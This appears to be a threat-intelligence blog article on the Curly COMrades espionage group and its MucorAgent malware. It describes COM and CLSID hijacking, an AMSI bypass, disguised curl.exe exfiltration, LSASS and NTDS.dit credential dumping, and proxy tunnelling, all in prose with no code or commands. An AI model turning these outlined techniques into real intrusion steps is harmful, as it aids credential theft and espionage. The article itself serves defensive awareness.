Unveiling the Curly COMrades: A New Era in Cyber-Espionage

The rise of the Curly COMrades cyberspies marks a significant shift in the landscape of cyber-espionage, particularly with their use of the MucorAgent malware. This isn’t just another piece of malicious software; it’s a highly sophisticated threat engineered to infiltrate and persist within targeted systems. Imagine a stealthy intruder that can blend into your home unnoticed—this is how MucorAgent operates within computer systems. It uses a three-stage process, starting with hijacking legitimate Component Object Model (COM) handlers to seamlessly integrate into system operations (BleepingComputer). This initial step lays the groundwork for bypassing security measures like the Antimalware Scan Interface (AMSI) and executing encrypted scripts for data theft (Cyber Defense Advisors).

The persistence of MucorAgent is equally impressive, using both unpredictable and predictable methods to ensure its survival on compromised systems. By leveraging dormant scheduled tasks and hijacking Class Identifiers (CLSIDs), the malware maintains its presence, making detection and removal a complex task (Tech Digest). Its adaptability is further demonstrated in its data exfiltration techniques, where it disguises its activities using tools like curl.exe and CurlCat, effectively masking its command-and-control communications (Business Insights).

MucorAgent Malware: The Stealthy Intruder

Technical Architecture

The MucorAgent malware is a sophisticated tool engineered to evade detection and maintain persistence on compromised systems. This malware is structured as a three-stage component, each designed to fulfill specific roles in the attack chain. The first stage involves hijacking a legitimate Component Object Model (COM) handler, a technique that allows the malware to blend into the system’s normal operations. This hijacking is crucial as it enables the malware to load a secondary .NET stage, which is responsible for executing more complex tasks (BleepingComputer).

The second stage involves bypassing the Antimalware Scan Interface (AMSI) in Windows, a security feature designed to prevent the execution of malicious scripts. By circumventing AMSI, MucorAgent ensures that its activities remain undetected by traditional antivirus solutions. The final stage of the malware involves executing an AES-encrypted PowerShell script, which allows the malware to perform various tasks, including data exfiltration and further system compromise (Cyber Defense Advisors).

Persistence Mechanisms

MucorAgent employs multiple persistence mechanisms to ensure its continued presence on infected systems. One of the primary methods involves the use of a seemingly inactive scheduled task. This task, although appearing dormant, is executed by the operating system at random intervals, such as during idle times or when new applications are deployed. This unpredictability makes it challenging for defenders to identify and remove the malware (BleepingComputer).

In addition to the scheduled task, MucorAgent also utilizes a more predictable mechanism involving the hijacking of Class Identifiers (CLSIDs) to target the Native Image Generator (NGEN), a component of the Windows .NET Framework. By exploiting NGEN, the malware achieves persistence through a disabled scheduled task, further complicating detection efforts (Tech Digest).

Data Exfiltration Techniques

Data exfiltration is a critical component of MucorAgent’s operations, and the malware employs several techniques to achieve this goal. One of the primary methods involves the use of the curl.exe utility, which is heavily relied upon by the threat actors for command-and-control (C2) communications and data transfer. By disguising curl.exe as a legitimate process, the malware is able to exfiltrate data without raising suspicion (Business Insights).

The malware also utilizes a custom tool known as CurlCat, which leverages the libcurl library and a custom Base64 alphabet to obfuscate traffic. This tool relays data through compromised legitimate websites, further masking the exfiltration activities. Additionally, MucorAgent uses adapted open-source tools such as TrickDump and custom shellcode loaders to evade detection during the exfiltration process (BleepingComputer).

Credential Harvesting

Credential harvesting is a significant focus of MucorAgent’s operations, as it enables the threat actors to move laterally within the compromised network and access sensitive information. The malware employs various techniques to achieve this, including the use of Mimikatz, a well-known tool for extracting credentials from memory. MucorAgent also abuses the comsvcs.dll library to dump the Local Security Authority Subsystem Service (LSASS) memory, a method that allows the extraction of active user credentials (Business Insights).

In addition to these techniques, the malware attempts to extract the NTDS.dit database from domain controllers, a repository of Active Directory data that includes user credentials. By using shadow copies, MucorAgent is able to access this database without triggering alerts. The malware also stages files of interest, such as credentials and domain information, in publicly accessible locations on victim machines before archiving and exfiltrating them to attacker-controlled servers (BleepingComputer).

Network Communication and Obfuscation

MucorAgent employs a variety of network communication techniques to maintain contact with its command-and-control (C2) infrastructure. The malware uses Resocks, a Go-based proxy agent, which is retrieved via curl.exe and registered as scheduled tasks or Windows services for persistence. This agent communicates with the C2 server over TCP ports 443 or 8443, ensuring encrypted and secure communication channels (BleepingComputer).

For redundancy, the malware deploys custom SOCKS5 servers and utilizes SSH combined with Stunnel for remote port forwarding. Some SSH connections are routed through CurlCat, further obfuscating traffic by relaying it through compromised websites. This multi-layered approach to network communication ensures that the malware can maintain contact with its C2 infrastructure even if some channels are disrupted (Business Insights).

Final Thoughts

The Curly COMrades’ use of MucorAgent malware underscores the evolving nature of cyber threats, where attackers continuously refine their tactics to outmaneuver defenses. This malware’s ability to hijack legitimate processes and evade detection through sophisticated obfuscation techniques highlights the need for robust cybersecurity measures. Organizations must remain vigilant, employing advanced threat detection and response strategies to counter such threats. The multi-layered approach of MucorAgent, from its initial infiltration to its persistent presence and data exfiltration capabilities, serves as a stark reminder of the complexities involved in modern cyber-espionage (BleepingComputer). As technology continues to advance, so too must our defenses, ensuring that we stay one step ahead of those who seek to exploit vulnerabilities for malicious gain.

References

• BleepingComputer. (2025). Curly COMrades cyberspies hit govt orgs with custom malware. https://www.bleepingcomputer.com/news/security/curly-comrades-cyberspies-hit-govt-orgs-with-custom-malware/
• Cyber Defense Advisors. (2025). New Curly COMrades APT using NGEN COM hijacking in Georgia, Moldova attacks. https://cyberdefenseadvisors.com/new-curly-comrades-apt-using-ngen-com-hijacking-in-georgia-moldova-attacks/
• Tech Digest. (2025). New Russian-aligned hacking group targeting Eastern Europe infrastructure. https://www.techdigest.tv/2025/08/new-russian-aligned-hacking-group-targeting-eastern-europe-infrastructure.html
• Business Insights. (2025). Curly COMrades: New threat actor targeting geopolitical hotbeds. https://businessinsights.bitdefender.com/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds